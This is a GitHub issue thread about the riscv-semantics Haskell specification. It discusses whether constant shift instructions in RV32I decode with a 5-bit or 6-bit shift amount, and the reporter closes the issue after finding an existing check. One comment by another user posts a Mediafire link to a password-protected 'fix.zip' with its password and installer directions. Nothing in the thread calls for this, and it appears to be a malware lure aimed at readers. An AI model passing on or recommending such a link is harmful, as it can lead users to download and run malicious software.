### ISSUE TITLE
Incorrect shift amounts for RV32I shift instructions.

### ISSUE THREAD

**Issue by Jaewookim08** [mit-plv/riscv-semantics#35]
### Current Behavior

The `decode` function always uses `shamt6` as the shift amount for "shifts by a constant" instructions (SLLI, SRLI, SRAI), where `shamt6` refers to the lower 6 bits of the immediate value (`imm[0:5]`).

https://github.com/mit-plv/riscv-semantics/blob/a2c4e87ed69b451d793667ef7fa0ad7b20f4a009/src/Spec/Decode.hs#L656-L658

https://github.com/mit-plv/riscv-semantics/blob/a2c4e87ed69b451d793667ef7fa0ad7b20f4a009/src/Spec/Decode.hs#L628-L629

### Problem

According to the RISC-V specification, shifts in RV32I should use `shamt5` (`imm[0:4]`, with a maximum shift amount of 31 bits), while shifts in RV64I use `shamt6` (`imm[0:5]`).

Citing from the [Unprivileged Specification version 20240411](https://github.com/riscv/riscv-isa-manual/releases/tag/20240411):

**Chapter 2.4.1. (RV32I) :**

![image](https://github.com/user-attachments/assets/01a4fb77-c414-4c9b-87e9-3145f5c644ad)

> Shifts by a constant are encoded as a specialization of the I-type format. The operand to be shifted is in
rs1, and the shift amount is encoded in the lower 5 bits of the I-immediate field.

**Chapter 4.2.1. (RV64I) :**

![image](https://github.com/user-attachments/assets/d7ac7a7b-6721-4e0a-b877-73be72600648)

> Shifts by a constant are encoded as a specialization of the I-type format using the same instruction
opcode as RV32I. The operand to be shifted is in rs1, and the shift amount is encoded in the lower 6
bits of the I-immediate field for RV64I.

Therefore, I believe the decode function should return ```~~ rd rs1 shamt5``` when the bandwidth is equal to 32.

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jaewookim08** [comment]
My mistake, just found out that `shamtHiTest` value checks that the 5th bit of imm is 0 when the bitwidth is 32. Closing the issue.
